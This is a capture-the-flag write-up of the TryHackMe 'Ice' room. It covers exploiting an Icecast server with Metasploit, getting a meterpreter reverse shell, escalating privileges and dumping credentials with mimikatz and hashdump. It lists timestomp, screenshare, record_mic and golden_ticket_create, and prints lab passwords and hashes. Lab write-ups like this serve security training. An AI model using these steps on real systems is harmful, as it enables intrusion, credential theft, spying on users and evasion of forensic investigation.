Ice - Write-up - TryHackMe

Information

Room#

  • Name: Ice
  • Profile: tryhackme.com
  • Difficulty: Easy
  • Description: Deploy & hack into a Windows machine, exploiting a very poorly secured media server.

Ice

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

1
$ sudo pacman -S nmap metasploit

Recon#

Once the scan completes, we'll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?

Answer: 3389

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# Nmap 7.91 scan initiated Mon Nov 30 19:10:47 2020 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.133.153
Nmap scan report for 10.10.133.153
Host is up (0.034s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
| http-methods:
|_ Supported Methods: GET
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m51s, median: 0s
| nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:85:73:b3:0d:93 (unknown)
| Names:
| DARK-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| DARK-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-11-30T12:12:43-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-30T18:12:42
|_ start_date: 2020-11-30T18:10:13

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 30 19:12:48 2020 -- 1 IP address (1 host up) scanned in 121.07 seconds

There was also port 3389/tcp but is doesn't show up every time.

What service did nmap identify as running on port 8000? (First word of this service)

Answer: Icecast

Read nmap scan result.

What does Nmap identify as the hostname of the machine? (All caps for the answer)

Answer: DARK-PC

Read nmap scan result.

Gain Access#

Now that we've identified some interesting services running on our target machine, let's do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.

Answer: execute code overflow

Search for Icecast on cvedetails.

https://www.cvedetails.com/vulnerability-list/vendor_id-693/Icecast.html

What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

Answer: CVE-2004-1561

After Metasploit has started, let's search for our target exploit using the command 'search icecast'. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in 'RP: Metasploit' which is recommended to be completed prior to this room, although not entirely necessary.

Answer: exploit/windows/http/icecast_header

Run the command from the question.

Following selecting our module, we now have to check what options we have to set. Run the command show options. What is the only required setting which currently is blank?

Answer: RHOSTS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf6 exploit(windows/http/icecast_header) > options

Module options (exploit/windows/http/icecast_header):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.133.153 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.19.77 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic

Escalate#

Woohoo! We've gained a foothold into our victim machine! What's the name of the shell we have now?

Answer: meterpreter

What user was running that Icecast process? The commands used in this question and the next few are taken directly from the 'RP: Metasploit' room.

Answer: Dark

List process:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
416 4 smss.exe
500 692 svchost.exe
544 536 csrss.exe
588 692 svchost.exe
592 536 wininit.exe
604 584 csrss.exe
652 584 winlogon.exe
692 592 services.exe
700 592 lsass.exe
708 592 lsm.exe
816 692 svchost.exe
884 692 svchost.exe
932 692 svchost.exe
1056 692 svchost.exe
1136 692 svchost.exe
1296 816 WmiPrvSE.exe
1332 692 spoolsv.exe
1344 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1368 1308 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1400 692 svchost.exe
1444 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1560 692 amazon-ssm-agent.exe
1656 692 LiteAgent.exe
1692 692 svchost.exe
1836 692 Ec2Config.exe
2104 692 svchost.exe
2300 1368 Icecast2.exe x86 1 Dark-PC\redacted C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2324 692 vds.exe
2596 692 SearchIndexer.exe
2672 692 TrustedInstaller.exe
2960 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe
2980 692 sppsvc.exe

What build of Windows is the system?

Answer: 7601

System info:

1
2
3
4
5
6
7
8
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build redacted, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows

Now that we know some of the finer details of the system we are working with, let's start escalating our privileges. First, what is the architecture of the process we're running?

Answer: x64

From previous command output.

Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?

Answer: exploit/windows/local/bypassuac_eventvwr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.133.153 - Collecting local exploits for x86/windows...
[*] 10.10.133.153 - 35 exploit checks are being tried...
[+] 10.10.133.153 - exploit/redacted: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.133.153 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.133.153 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.133.153 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.133.153 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.133.153 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.133.153 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.133.153 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.133.153 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

Now that we've set our session number, further options will be revealed in the options menu. We'll have to set one more as our listener IP isn't correct. What is the name of this option?

Answer: LHOST

We can now verify that we have expanded permissions using the command SeTakeOwnershipPrivilege. What permission listed allows us to take ownership of files?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
redacted
SeTimeZonePrivilege
SeUndockPrivilege

Looting#

In order to interact with lsass we need to be 'living in' a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it'll restart if we crash it! What's the name of the printer service?

Mentioned within this question is the term 'living in' a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.

Answer: spoolsv.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
500 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1056 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1088 2300 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
1136 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1296 816 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1332 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1344 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1368 1308 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1400 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1444 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1560 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1656 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1692 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1836 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
2104 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2268 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
2300 1368 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2324 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2596 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2672 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2704 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
2952 600 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2960 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe
2980 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe

meterpreter > migrate -N redacted.exe
[*] Migrating from 2952 to 1332...
[*] Migration completed successfully.

Let's check what user we are now with the command getuid. What user is listed?

Answer: NT AUTHORITY\SYSTEM

1
2
meterpreter > getuid
Server username: edited

Which command allows up to retrieve all credentials?

Answer: creds_all

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!

tspkg credentials
=================

Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)

Run this command now. What is Dark's password? Mimikatz allows us to steal this password out of memory even without the user 'Dark' logged in as there is a scheduled task that runs the Icecast as the user 'Dark'. It also helps that Windows Defender isn't running on the box ;) (Take a look again at the ps list, this box isn't in the best shape with both the firewall and defender disabled)

Answer: Password01!

1
$ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=nt

Post-Exploitation#

What command allows us to dump all of the password hashes stored on the system? We won't crack the Administrative password in this case as it's pretty strong (this is intentional to avoid password spraying attempts)

Answer: hashdump

1
2
3
4
meterpreter > edited
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

While more useful when interacting with a machine being used, what command allows us to watch the remote user's desktop in real time?

Answer: screenshare

Check the help command.

How about if we wanted to record from a microphone attached to the system?

Answer: record_mic

Check the help command.

To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don't ever do this on a pentest unless you're explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.

Answer: timestomp

Check the help command.

Mimikatz allows us to create what's called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?

Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.

Answer: golden_ticket_create

Check the help command.

Share